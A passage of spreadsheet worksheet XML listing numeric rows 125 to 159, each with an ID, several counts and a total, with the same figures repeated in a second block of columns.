        <v>144</v>
      </c>
      <c r="K125" s="7">
        <v>366</v>
      </c>
      <c r="L125" s="8">
        <v>24</v>
      </c>
      <c r="M125" s="8">
        <v>1</v>
      </c>
      <c r="N125" s="8">
        <v>9</v>
      </c>
      <c r="O125" s="8">
        <v>14</v>
      </c>
      <c r="P125" s="8">
        <v>23</v>
      </c>
      <c r="Q125" s="8">
        <v>73</v>
      </c>
    </row>
    <row r="126" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A126" s="7">
        <v>367</v>
      </c>
      <c r="B126" s="8">
        <v>26</v>
      </c>
      <c r="C126" s="8">
        <v>1</v>
      </c>
      <c r="D126" s="8">
        <v>34</v>
      </c>
      <c r="E126" s="8">
        <v>32</v>
      </c>
      <c r="F126" s="8">
        <v>22</v>
      </c>
      <c r="G126" s="8">
        <v>2</v>
      </c>
      <c r="H126" s="8">
        <v>117</v>
      </c>
      <c r="K126" s="7">
        <v>367</v>
      </c>
      <c r="L126" s="8">
        <v>26</v>
      </c>
      <c r="M126" s="8">
        <v>1</v>
      </c>
      <c r="N126" s="8">
        <v>34</v>
      </c>
      <c r="O126" s="8">
        <v>32</v>
      </c>
      <c r="P126" s="8">
        <v>22</v>
      </c>
      <c r="Q126" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="127" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A127" s="7">
        <v>368</v>
      </c>
      <c r="B127" s="8">
        <v>26</v>
      </c>
      <c r="C127" s="8">
        <v>0</v>
      </c>
      <c r="D127" s="8">
        <v>0</v>
      </c>
      <c r="E127" s="8">
        <v>0</v>
      </c>
      <c r="F127" s="8">
        <v>8</v>
      </c>
      <c r="G127" s="8">
        <v>2</v>
      </c>
      <c r="H127" s="8">
        <v>36</v>
      </c>
      <c r="K127" s="7">
        <v>368</v>
      </c>
      <c r="L127" s="8">
        <v>26</v>
      </c>
      <c r="M127" s="8">
        <v>0</v>
      </c>
      <c r="N127" s="8">
        <v>0</v>
      </c>
      <c r="O127" s="8">
        <v>0</v>
      </c>
      <c r="P127" s="8">
        <v>8</v>
      </c>
      <c r="Q127" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="128" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A128" s="7">
        <v>371</v>
      </c>
      <c r="B128" s="8">
        <v>25</v>
      </c>
      <c r="C128" s="8">
        <v>1</v>
      </c>
      <c r="D128" s="8">
        <v>0</v>
      </c>
      <c r="E128" s="8">
        <v>0</v>
      </c>
      <c r="F128" s="8">
        <v>2</v>
      </c>
      <c r="G128" s="8">
        <v>0</v>
      </c>
      <c r="H128" s="8">
        <v>28</v>
      </c>
      <c r="K128" s="7">
        <v>371</v>
      </c>
      <c r="L128" s="8">
        <v>25</v>
      </c>
      <c r="M128" s="8">
        <v>1</v>
      </c>
      <c r="N128" s="8">
        <v>0</v>
      </c>
      <c r="O128" s="8">
        <v>0</v>
      </c>
      <c r="P128" s="8">
        <v>2</v>
      </c>
      <c r="Q128" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="129" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A129" s="7">
        <v>373</v>
      </c>
      <c r="B129" s="8">
        <v>25</v>
      </c>
      <c r="C129" s="8">
        <v>1</v>
      </c>
      <c r="D129" s="8">
        <v>16</v>
      </c>
      <c r="E129" s="8">
        <v>1913</v>
      </c>
      <c r="F129" s="8">
        <v>236</v>
      </c>
      <c r="G129" s="8">
        <v>139</v>
      </c>
      <c r="H129" s="8">
        <v>2330</v>
      </c>
      <c r="K129" s="7">
        <v>373</v>
      </c>
      <c r="L129" s="8">
        <v>25</v>
      </c>
      <c r="M129" s="8">
        <v>1</v>
      </c>
      <c r="N129" s="8">
        <v>16</v>
      </c>
      <c r="O129" s="8">
        <v>1913</v>
      </c>
      <c r="P129" s="8">
        <v>236</v>
      </c>
      <c r="Q129" s="8">
        <v>139</v>
      </c>
    </row>
    <row r="130" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A130" s="7">
        <v>374</v>
      </c>
      <c r="B130" s="8">
        <v>25</v>
      </c>
      <c r="C130" s="8">
        <v>1</v>
      </c>
      <c r="D130" s="8">
        <v>32</v>
      </c>
      <c r="E130" s="8">
        <v>149</v>
      </c>
      <c r="F130" s="8">
        <v>16</v>
      </c>
      <c r="G130" s="8">
        <v>2</v>
      </c>
      <c r="H130" s="8">
        <v>225</v>
      </c>
      <c r="K130" s="7">
        <v>374</v>
      </c>
      <c r="L130" s="8">
        <v>25</v>
      </c>
      <c r="M130" s="8">
        <v>1</v>
      </c>
      <c r="N130" s="8">
        <v>32</v>
      </c>
      <c r="O130" s="8">
        <v>149</v>
      </c>
      <c r="P130" s="8">
        <v>16</v>
      </c>
      <c r="Q130" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="131" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A131" s="7">
        <v>379</v>
      </c>
      <c r="B131" s="8">
        <v>27</v>
      </c>
      <c r="C131" s="8">
        <v>0</v>
      </c>
      <c r="D131" s="8">
        <v>5</v>
      </c>
      <c r="E131" s="8">
        <v>0</v>
      </c>
      <c r="F131" s="8">
        <v>3</v>
      </c>
      <c r="G131" s="8">
        <v>3</v>
      </c>
      <c r="H131" s="8">
        <v>38</v>
      </c>
      <c r="K131" s="7">
        <v>379</v>
      </c>
      <c r="L131" s="8">
        <v>27</v>
      </c>
      <c r="M131" s="8">
        <v>0</v>
      </c>
      <c r="N131" s="8">
        <v>5</v>
      </c>
      <c r="O131" s="8">
        <v>0</v>
      </c>
      <c r="P131" s="8">
        <v>3</v>
      </c>
      <c r="Q131" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="132" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A132" s="7">
        <v>383</v>
      </c>
      <c r="B132" s="8">
        <v>25</v>
      </c>
      <c r="C132" s="8">
        <v>1</v>
      </c>
      <c r="D132" s="8">
        <v>54</v>
      </c>
      <c r="E132" s="8">
        <v>288</v>
      </c>
      <c r="F132" s="8">
        <v>16</v>
      </c>
      <c r="G132" s="8">
        <v>15</v>
      </c>
      <c r="H132" s="8">
        <v>399</v>
      </c>
      <c r="K132" s="7">
        <v>383</v>
      </c>
      <c r="L132" s="8">
        <v>25</v>
      </c>
      <c r="M132" s="8">
        <v>1</v>
      </c>
      <c r="N132" s="8">
        <v>54</v>
      </c>
      <c r="O132" s="8">
        <v>288</v>
      </c>
      <c r="P132" s="8">
        <v>16</v>
      </c>
      <c r="Q132" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="133" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A133" s="7">
        <v>384</v>
      </c>
      <c r="B133" s="8">
        <v>142</v>
      </c>
      <c r="C133" s="8">
        <v>272</v>
      </c>
      <c r="D133" s="8">
        <v>40</v>
      </c>
      <c r="E133" s="8">
        <v>17</v>
      </c>
      <c r="F133" s="8">
        <v>46</v>
      </c>
      <c r="G133" s="8">
        <v>9</v>
      </c>
      <c r="H133" s="8">
        <v>526</v>
      </c>
      <c r="K133" s="7">
        <v>384</v>
      </c>
      <c r="L133" s="8">
        <v>142</v>
      </c>
      <c r="M133" s="8">
        <v>272</v>
      </c>
      <c r="N133" s="8">
        <v>40</v>
      </c>
      <c r="O133" s="8">
        <v>17</v>
      </c>
      <c r="P133" s="8">
        <v>46</v>
      </c>
      <c r="Q133" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="134" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A134" s="7">
        <v>385</v>
      </c>
      <c r="B134" s="8">
        <v>25</v>
      </c>
      <c r="C134" s="8">
        <v>0</v>
      </c>
      <c r="D134" s="8">
        <v>7</v>
      </c>
      <c r="E134" s="8">
        <v>0</v>
      </c>
      <c r="F134" s="8">
        <v>3</v>
      </c>
      <c r="G134" s="8">
        <v>1</v>
      </c>
      <c r="H134" s="8">
        <v>36</v>
      </c>
      <c r="K134" s="7">
        <v>385</v>
      </c>
      <c r="L134" s="8">
        <v>25</v>
      </c>
      <c r="M134" s="8">
        <v>0</v>
      </c>
      <c r="N134" s="8">
        <v>7</v>
      </c>
      <c r="O134" s="8">
        <v>0</v>
      </c>
      <c r="P134" s="8">
        <v>3</v>
      </c>
      <c r="Q134" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="135" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A135" s="7">
        <v>388</v>
      </c>
      <c r="B135" s="8">
        <v>25</v>
      </c>
      <c r="C135" s="8">
        <v>1</v>
      </c>
      <c r="D135" s="8">
        <v>9</v>
      </c>
      <c r="E135" s="8">
        <v>78</v>
      </c>
      <c r="F135" s="8">
        <v>1</v>
      </c>
      <c r="G135" s="8">
        <v>2</v>
      </c>
      <c r="H135" s="8">
        <v>116</v>
      </c>
      <c r="K135" s="7">
        <v>388</v>
      </c>
      <c r="L135" s="8">
        <v>25</v>
      </c>
      <c r="M135" s="8">
        <v>1</v>
      </c>
      <c r="N135" s="8">
        <v>9</v>
      </c>
      <c r="O135" s="8">
        <v>78</v>
      </c>
      <c r="P135" s="8">
        <v>1</v>
      </c>
      <c r="Q135" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="136" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A136" s="7">
        <v>389</v>
      </c>
      <c r="B136" s="8">
        <v>31</v>
      </c>
      <c r="C136" s="8">
        <v>1</v>
      </c>
      <c r="D136" s="8">
        <v>34</v>
      </c>
      <c r="E136" s="8">
        <v>96</v>
      </c>
      <c r="F136" s="8">
        <v>7</v>
      </c>
      <c r="G136" s="8">
        <v>7</v>
      </c>
      <c r="H136" s="8">
        <v>176</v>
      </c>
      <c r="K136" s="7">
        <v>389</v>
      </c>
      <c r="L136" s="8">
        <v>31</v>
      </c>
      <c r="M136" s="8">
        <v>1</v>
      </c>
      <c r="N136" s="8">
        <v>34</v>
      </c>
      <c r="O136" s="8">
        <v>96</v>
      </c>
      <c r="P136" s="8">
        <v>7</v>
      </c>
      <c r="Q136" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="137" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A137" s="7">
        <v>390</v>
      </c>
      <c r="B137" s="8">
        <v>25</v>
      </c>
      <c r="C137" s="8">
        <v>2</v>
      </c>
      <c r="D137" s="8">
        <v>252</v>
      </c>
      <c r="E137" s="8">
        <v>461</v>
      </c>
      <c r="F137" s="8">
        <v>33</v>
      </c>
      <c r="G137" s="8">
        <v>29</v>
      </c>
      <c r="H137" s="8">
        <v>802</v>
      </c>
      <c r="K137" s="7">
        <v>390</v>
      </c>
      <c r="L137" s="8">
        <v>25</v>
      </c>
      <c r="M137" s="8">
        <v>2</v>
      </c>
      <c r="N137" s="8">
        <v>252</v>
      </c>
      <c r="O137" s="8">
        <v>461</v>
      </c>
      <c r="P137" s="8">
        <v>33</v>
      </c>
      <c r="Q137" s="8">
        <v>29</v>
      </c>
    </row>
    <row r="138" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A138" s="7">
        <v>395</v>
      </c>
      <c r="B138" s="8">
        <v>24</v>
      </c>
      <c r="C138" s="8">
        <v>1</v>
      </c>
      <c r="D138" s="8">
        <v>1</v>
      </c>
      <c r="E138" s="8">
        <v>0</v>
      </c>
      <c r="F138" s="8">
        <v>11</v>
      </c>
      <c r="G138" s="8">
        <v>7</v>
      </c>
      <c r="H138" s="8">
        <v>44</v>
      </c>
      <c r="K138" s="7">
        <v>395</v>
      </c>
      <c r="L138" s="8">
        <v>24</v>
      </c>
      <c r="M138" s="8">
        <v>1</v>
      </c>
      <c r="N138" s="8">
        <v>1</v>
      </c>
      <c r="O138" s="8">
        <v>0</v>
      </c>
      <c r="P138" s="8">
        <v>11</v>
      </c>
      <c r="Q138" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="139" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A139" s="7">
        <v>396</v>
      </c>
      <c r="B139" s="8">
        <v>22</v>
      </c>
      <c r="C139" s="8">
        <v>1</v>
      </c>
      <c r="D139" s="8">
        <v>0</v>
      </c>
      <c r="E139" s="8">
        <v>0</v>
      </c>
      <c r="F139" s="8">
        <v>5</v>
      </c>
      <c r="G139" s="8">
        <v>5</v>
      </c>
      <c r="H139" s="8">
        <v>33</v>
      </c>
      <c r="K139" s="7">
        <v>396</v>
      </c>
      <c r="L139" s="8">
        <v>22</v>
      </c>
      <c r="M139" s="8">
        <v>1</v>
      </c>
      <c r="N139" s="8">
        <v>0</v>
      </c>
      <c r="O139" s="8">
        <v>0</v>
      </c>
      <c r="P139" s="8">
        <v>5</v>
      </c>
      <c r="Q139" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="140" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A140" s="7">
        <v>400</v>
      </c>
      <c r="B140" s="8">
        <v>0</v>
      </c>
      <c r="C140" s="8">
        <v>0</v>
      </c>
      <c r="D140" s="8">
        <v>0</v>
      </c>
      <c r="E140" s="8">
        <v>0</v>
      </c>
      <c r="F140" s="8">
        <v>0</v>
      </c>
      <c r="G140" s="8">
        <v>0</v>
      </c>
      <c r="H140" s="8">
        <v>0</v>
      </c>
      <c r="K140" s="7">
        <v>400</v>
      </c>
      <c r="L140" s="8">
        <v>0</v>
      </c>
      <c r="M140" s="8">
        <v>0</v>
      </c>
      <c r="N140" s="8">
        <v>0</v>
      </c>
      <c r="O140" s="8">
        <v>0</v>
      </c>
      <c r="P140" s="8">
        <v>0</v>
      </c>
      <c r="Q140" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="141" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A141" s="7">
        <v>403</v>
      </c>
      <c r="B141" s="8">
        <v>26</v>
      </c>
      <c r="C141" s="8">
        <v>0</v>
      </c>
      <c r="D141" s="8">
        <v>0</v>
      </c>
      <c r="E141" s="8">
        <v>0</v>
      </c>
      <c r="F141" s="8">
        <v>2</v>
      </c>
      <c r="G141" s="8">
        <v>2</v>
      </c>
      <c r="H141" s="8">
        <v>30</v>
      </c>
      <c r="K141" s="7">
        <v>403</v>
      </c>
      <c r="L141" s="8">
        <v>26</v>
      </c>
      <c r="M141" s="8">
        <v>0</v>
      </c>
      <c r="N141" s="8">
        <v>0</v>
      </c>
      <c r="O141" s="8">
        <v>0</v>
      </c>
      <c r="P141" s="8">
        <v>2</v>
      </c>
      <c r="Q141" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="142" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A142" s="7">
        <v>408</v>
      </c>
      <c r="B142" s="8">
        <v>21</v>
      </c>
      <c r="C142" s="8">
        <v>1</v>
      </c>
      <c r="D142" s="8">
        <v>0</v>
      </c>
      <c r="E142" s="8">
        <v>0</v>
      </c>
      <c r="F142" s="8">
        <v>8</v>
      </c>
      <c r="G142" s="8">
        <v>20</v>
      </c>
      <c r="H142" s="8">
        <v>50</v>
      </c>
      <c r="K142" s="7">
        <v>408</v>
      </c>
      <c r="L142" s="8">
        <v>21</v>
      </c>
      <c r="M142" s="8">
        <v>1</v>
      </c>
      <c r="N142" s="8">
        <v>0</v>
      </c>
      <c r="O142" s="8">
        <v>0</v>
      </c>
      <c r="P142" s="8">
        <v>8</v>
      </c>
      <c r="Q142" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="143" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A143" s="7">
        <v>411</v>
      </c>
      <c r="B143" s="8">
        <v>25</v>
      </c>
      <c r="C143" s="8">
        <v>1</v>
      </c>
      <c r="D143" s="8">
        <v>22</v>
      </c>
      <c r="E143" s="8">
        <v>6</v>
      </c>
      <c r="F143" s="8">
        <v>14</v>
      </c>
      <c r="G143" s="8">
        <v>6</v>
      </c>
      <c r="H143" s="8">
        <v>74</v>
      </c>
      <c r="K143" s="7">
        <v>411</v>
      </c>
      <c r="L143" s="8">
        <v>25</v>
      </c>
      <c r="M143" s="8">
        <v>1</v>
      </c>
      <c r="N143" s="8">
        <v>22</v>
      </c>
      <c r="O143" s="8">
        <v>6</v>
      </c>
      <c r="P143" s="8">
        <v>14</v>
      </c>
      <c r="Q143" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="144" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A144" s="7">
        <v>415</v>
      </c>
      <c r="B144" s="8">
        <v>26</v>
      </c>
      <c r="C144" s="8">
        <v>1</v>
      </c>
      <c r="D144" s="8">
        <v>23</v>
      </c>
      <c r="E144" s="8">
        <v>40</v>
      </c>
      <c r="F144" s="8">
        <v>11</v>
      </c>
      <c r="G144" s="8">
        <v>5</v>
      </c>
      <c r="H144" s="8">
        <v>106</v>
      </c>
      <c r="K144" s="7">
        <v>415</v>
      </c>
      <c r="L144" s="8">
        <v>26</v>
      </c>
      <c r="M144" s="8">
        <v>1</v>
      </c>
      <c r="N144" s="8">
        <v>23</v>
      </c>
      <c r="O144" s="8">
        <v>40</v>
      </c>
      <c r="P144" s="8">
        <v>11</v>
      </c>
      <c r="Q144" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="145" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A145" s="7">
        <v>420</v>
      </c>
      <c r="B145" s="8">
        <v>25</v>
      </c>
      <c r="C145" s="8">
        <v>0</v>
      </c>
      <c r="D145" s="8">
        <v>30</v>
      </c>
      <c r="E145" s="8">
        <v>3</v>
      </c>
      <c r="F145" s="8">
        <v>7</v>
      </c>
      <c r="G145" s="8">
        <v>7</v>
      </c>
      <c r="H145" s="8">
        <v>72</v>
      </c>
      <c r="K145" s="7">
        <v>420</v>
      </c>
      <c r="L145" s="8">
        <v>25</v>
      </c>
      <c r="M145" s="8">
        <v>0</v>
      </c>
      <c r="N145" s="8">
        <v>30</v>
      </c>
      <c r="O145" s="8">
        <v>3</v>
      </c>
      <c r="P145" s="8">
        <v>7</v>
      </c>
      <c r="Q145" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="146" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A146" s="7">
        <v>423</v>
      </c>
      <c r="B146" s="8">
        <v>24</v>
      </c>
      <c r="C146" s="8">
        <v>0</v>
      </c>
      <c r="D146" s="8">
        <v>0</v>
      </c>
      <c r="E146" s="8">
        <v>0</v>
      </c>
      <c r="F146" s="8">
        <v>9</v>
      </c>
      <c r="G146" s="8">
        <v>0</v>
      </c>
      <c r="H146" s="8">
        <v>33</v>
      </c>
      <c r="K146" s="7">
        <v>423</v>
      </c>
      <c r="L146" s="8">
        <v>24</v>
      </c>
      <c r="M146" s="8">
        <v>0</v>
      </c>
      <c r="N146" s="8">
        <v>0</v>
      </c>
      <c r="O146" s="8">
        <v>0</v>
      </c>
      <c r="P146" s="8">
        <v>9</v>
      </c>
      <c r="Q146" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="147" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A147" s="7">
        <v>427</v>
      </c>
      <c r="B147" s="8">
        <v>25</v>
      </c>
      <c r="C147" s="8">
        <v>1</v>
      </c>
      <c r="D147" s="8">
        <v>6</v>
      </c>
      <c r="E147" s="8">
        <v>0</v>
      </c>
      <c r="F147" s="8">
        <v>4</v>
      </c>
      <c r="G147" s="8">
        <v>2</v>
      </c>
      <c r="H147" s="8">
        <v>38</v>
      </c>
      <c r="K147" s="7">
        <v>427</v>
      </c>
      <c r="L147" s="8">
        <v>25</v>
      </c>
      <c r="M147" s="8">
        <v>1</v>
      </c>
      <c r="N147" s="8">
        <v>6</v>
      </c>
      <c r="O147" s="8">
        <v>0</v>
      </c>
      <c r="P147" s="8">
        <v>4</v>
      </c>
      <c r="Q147" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="148" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A148" s="7">
        <v>428</v>
      </c>
      <c r="B148" s="8">
        <v>24</v>
      </c>
      <c r="C148" s="8">
        <v>0</v>
      </c>
      <c r="D148" s="8">
        <v>0</v>
      </c>
      <c r="E148" s="8">
        <v>0</v>
      </c>
      <c r="F148" s="8">
        <v>9</v>
      </c>
      <c r="G148" s="8">
        <v>0</v>
      </c>
      <c r="H148" s="8">
        <v>33</v>
      </c>
      <c r="K148" s="7">
        <v>428</v>
      </c>
      <c r="L148" s="8">
        <v>24</v>
      </c>
      <c r="M148" s="8">
        <v>0</v>
      </c>
      <c r="N148" s="8">
        <v>0</v>
      </c>
      <c r="O148" s="8">
        <v>0</v>
      </c>
      <c r="P148" s="8">
        <v>9</v>
      </c>
      <c r="Q148" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="149" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A149" s="7">
        <v>430</v>
      </c>
      <c r="B149" s="8">
        <v>6</v>
      </c>
      <c r="C149" s="8">
        <v>3</v>
      </c>
      <c r="D149" s="8">
        <v>68</v>
      </c>
      <c r="E149" s="8">
        <v>104</v>
      </c>
      <c r="F149" s="8">
        <v>51</v>
      </c>
      <c r="G149" s="8">
        <v>9</v>
      </c>
      <c r="H149" s="8">
        <v>241</v>
      </c>
      <c r="K149" s="7">
        <v>430</v>
      </c>
      <c r="L149" s="8">
        <v>6</v>
      </c>
      <c r="M149" s="8">
        <v>3</v>
      </c>
      <c r="N149" s="8">
        <v>68</v>
      </c>
      <c r="O149" s="8">
        <v>104</v>
      </c>
      <c r="P149" s="8">
        <v>51</v>
      </c>
      <c r="Q149" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="150" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A150" s="7">
        <v>433</v>
      </c>
      <c r="B150" s="8">
        <v>25</v>
      </c>
      <c r="C150" s="8">
        <v>1</v>
      </c>
      <c r="D150" s="8">
        <v>5</v>
      </c>
      <c r="E150" s="8">
        <v>4</v>
      </c>
      <c r="F150" s="8">
        <v>3</v>
      </c>
      <c r="G150" s="8">
        <v>3</v>
      </c>
      <c r="H150" s="8">
        <v>41</v>
      </c>
      <c r="K150" s="7">
        <v>433</v>
      </c>
      <c r="L150" s="8">
        <v>25</v>
      </c>
      <c r="M150" s="8">
        <v>1</v>
      </c>
      <c r="N150" s="8">
        <v>5</v>
      </c>
      <c r="O150" s="8">
        <v>4</v>
      </c>
      <c r="P150" s="8">
        <v>3</v>
      </c>
      <c r="Q150" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="151" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A151" s="7">
        <v>438</v>
      </c>
      <c r="B151" s="8">
        <v>6</v>
      </c>
      <c r="C151" s="8">
        <v>1</v>
      </c>
      <c r="D151" s="8">
        <v>1</v>
      </c>
      <c r="E151" s="8">
        <v>6</v>
      </c>
      <c r="F151" s="8">
        <v>0</v>
      </c>
      <c r="G151" s="8">
        <v>0</v>
      </c>
      <c r="H151" s="8">
        <v>14</v>
      </c>
      <c r="K151" s="7">
        <v>438</v>
      </c>
      <c r="L151" s="8">
        <v>6</v>
      </c>
      <c r="M151" s="8">
        <v>1</v>
      </c>
      <c r="N151" s="8">
        <v>1</v>
      </c>
      <c r="O151" s="8">
        <v>6</v>
      </c>
      <c r="P151" s="8">
        <v>0</v>
      </c>
      <c r="Q151" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="152" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A152" s="7">
        <v>439</v>
      </c>
      <c r="B152" s="8">
        <v>26</v>
      </c>
      <c r="C152" s="8">
        <v>1</v>
      </c>
      <c r="D152" s="8">
        <v>0</v>
      </c>
      <c r="E152" s="8">
        <v>0</v>
      </c>
      <c r="F152" s="8">
        <v>18</v>
      </c>
      <c r="G152" s="8">
        <v>29</v>
      </c>
      <c r="H152" s="8">
        <v>74</v>
      </c>
      <c r="K152" s="7">
        <v>439</v>
      </c>
      <c r="L152" s="8">
        <v>26</v>
      </c>
      <c r="M152" s="8">
        <v>1</v>
      </c>
      <c r="N152" s="8">
        <v>0</v>
      </c>
      <c r="O152" s="8">
        <v>0</v>
      </c>
      <c r="P152" s="8">
        <v>18</v>
      </c>
      <c r="Q152" s="8">
        <v>29</v>
      </c>
    </row>
    <row r="153" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A153" s="7">
        <v>442</v>
      </c>
      <c r="B153" s="8">
        <v>25</v>
      </c>
      <c r="C153" s="8">
        <v>1</v>
      </c>
      <c r="D153" s="8">
        <v>147</v>
      </c>
      <c r="E153" s="8">
        <v>384</v>
      </c>
      <c r="F153" s="8">
        <v>26</v>
      </c>
      <c r="G153" s="8">
        <v>41</v>
      </c>
      <c r="H153" s="8">
        <v>624</v>
      </c>
      <c r="K153" s="7">
        <v>442</v>
      </c>
      <c r="L153" s="8">
        <v>25</v>
      </c>
      <c r="M153" s="8">
        <v>1</v>
      </c>
      <c r="N153" s="8">
        <v>147</v>
      </c>
      <c r="O153" s="8">
        <v>384</v>
      </c>
      <c r="P153" s="8">
        <v>26</v>
      </c>
      <c r="Q153" s="8">
        <v>41</v>
      </c>
    </row>
    <row r="154" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A154" s="7">
        <v>444</v>
      </c>
      <c r="B154" s="8">
        <v>26</v>
      </c>
      <c r="C154" s="8">
        <v>1</v>
      </c>
      <c r="D154" s="8">
        <v>8</v>
      </c>
      <c r="E154" s="8">
        <v>19</v>
      </c>
      <c r="F154" s="8">
        <v>7</v>
      </c>
      <c r="G154" s="8">
        <v>11</v>
      </c>
      <c r="H154" s="8">
        <v>72</v>
      </c>
      <c r="K154" s="7">
        <v>444</v>
      </c>
      <c r="L154" s="8">
        <v>26</v>
      </c>
      <c r="M154" s="8">
        <v>1</v>
      </c>
      <c r="N154" s="8">
        <v>8</v>
      </c>
      <c r="O154" s="8">
        <v>19</v>
      </c>
      <c r="P154" s="8">
        <v>7</v>
      </c>
      <c r="Q154" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="155" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A155" s="7">
        <v>446</v>
      </c>
      <c r="B155" s="8">
        <v>24</v>
      </c>
      <c r="C155" s="8">
        <v>4</v>
      </c>
      <c r="D155" s="8">
        <v>87</v>
      </c>
      <c r="E155" s="8">
        <v>63</v>
      </c>
      <c r="F155" s="8">
        <v>132</v>
      </c>
      <c r="G155" s="8">
        <v>334</v>
      </c>
      <c r="H155" s="8">
        <v>644</v>
      </c>
      <c r="K155" s="7">
        <v>446</v>
      </c>
      <c r="L155" s="8">
        <v>24</v>
      </c>
      <c r="M155" s="8">
        <v>4</v>
      </c>
      <c r="N155" s="8">
        <v>87</v>
      </c>
      <c r="O155" s="8">
        <v>63</v>
      </c>
      <c r="P155" s="8">
        <v>132</v>
      </c>
      <c r="Q155" s="8">
        <v>334</v>
      </c>
    </row>
    <row r="156" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A156" s="7">
        <v>452</v>
      </c>
      <c r="B156" s="8">
        <v>25</v>
      </c>
      <c r="C156" s="8">
        <v>5</v>
      </c>
      <c r="D156" s="8">
        <v>0</v>
      </c>
      <c r="E156" s="8">
        <v>0</v>
      </c>
      <c r="F156" s="8">
        <v>1428</v>
      </c>
      <c r="G156" s="8">
        <v>73</v>
      </c>
      <c r="H156" s="8">
        <v>1531</v>
      </c>
      <c r="K156" s="7">
        <v>452</v>
      </c>
      <c r="L156" s="8">
        <v>25</v>
      </c>
      <c r="M156" s="8">
        <v>5</v>
      </c>
      <c r="N156" s="8">
        <v>0</v>
      </c>
      <c r="O156" s="8">
        <v>0</v>
      </c>
      <c r="P156" s="8">
        <v>1428</v>
      </c>
      <c r="Q156" s="8">
        <v>73</v>
      </c>
    </row>
    <row r="157" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A157" s="7">
        <v>454</v>
      </c>
      <c r="B157" s="8">
        <v>6</v>
      </c>
      <c r="C157" s="8">
        <v>1</v>
      </c>
      <c r="D157" s="8">
        <v>5</v>
      </c>
      <c r="E157" s="8">
        <v>6</v>
      </c>
      <c r="F157" s="8">
        <v>0</v>
      </c>
      <c r="G157" s="8">
        <v>1</v>
      </c>
      <c r="H157" s="8">
        <v>19</v>
      </c>
      <c r="K157" s="7">
        <v>454</v>
      </c>
      <c r="L157" s="8">
        <v>6</v>
      </c>
      <c r="M157" s="8">
        <v>1</v>
      </c>
      <c r="N157" s="8">
        <v>5</v>
      </c>
      <c r="O157" s="8">
        <v>6</v>
      </c>
      <c r="P157" s="8">
        <v>0</v>
      </c>
      <c r="Q157" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="158" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A158" s="7">
        <v>455</v>
      </c>
      <c r="B158" s="8">
        <v>25</v>
      </c>
      <c r="C158" s="8">
        <v>1</v>
      </c>
      <c r="D158" s="8">
        <v>19</v>
      </c>
      <c r="E158" s="8">
        <v>13</v>
      </c>
      <c r="F158" s="8">
        <v>15</v>
      </c>
      <c r="G158" s="8">
        <v>1</v>
      </c>
      <c r="H158" s="8">
        <v>74</v>
      </c>
      <c r="K158" s="7">
        <v>455</v>
      </c>
      <c r="L158" s="8">
        <v>25</v>
      </c>
      <c r="M158" s="8">
        <v>1</v>
      </c>
      <c r="N158" s="8">
        <v>19</v>
      </c>
      <c r="O158" s="8">
        <v>13</v>
      </c>
      <c r="P158" s="8">
        <v>15</v>
      </c>
      <c r="Q158" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="159" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A159" s="7">
        <v>456</v>
      </c>
      <c r="B159" s="8">
        <v>26</v>
      </c>
      <c r="C159" s="8">
        <v>1</v>
      </c>
      <c r="D159" s="8">
        <v>0</v>
      </c>
      <c r="E159" s="8">
        <v>0</v>
      </c>
      <c r="F159" s="8">
        <v>11</v>
      </c>
      <c r="G159" s="8">
        <v>3</v>
      </c>
      <c r="H159" s="8">
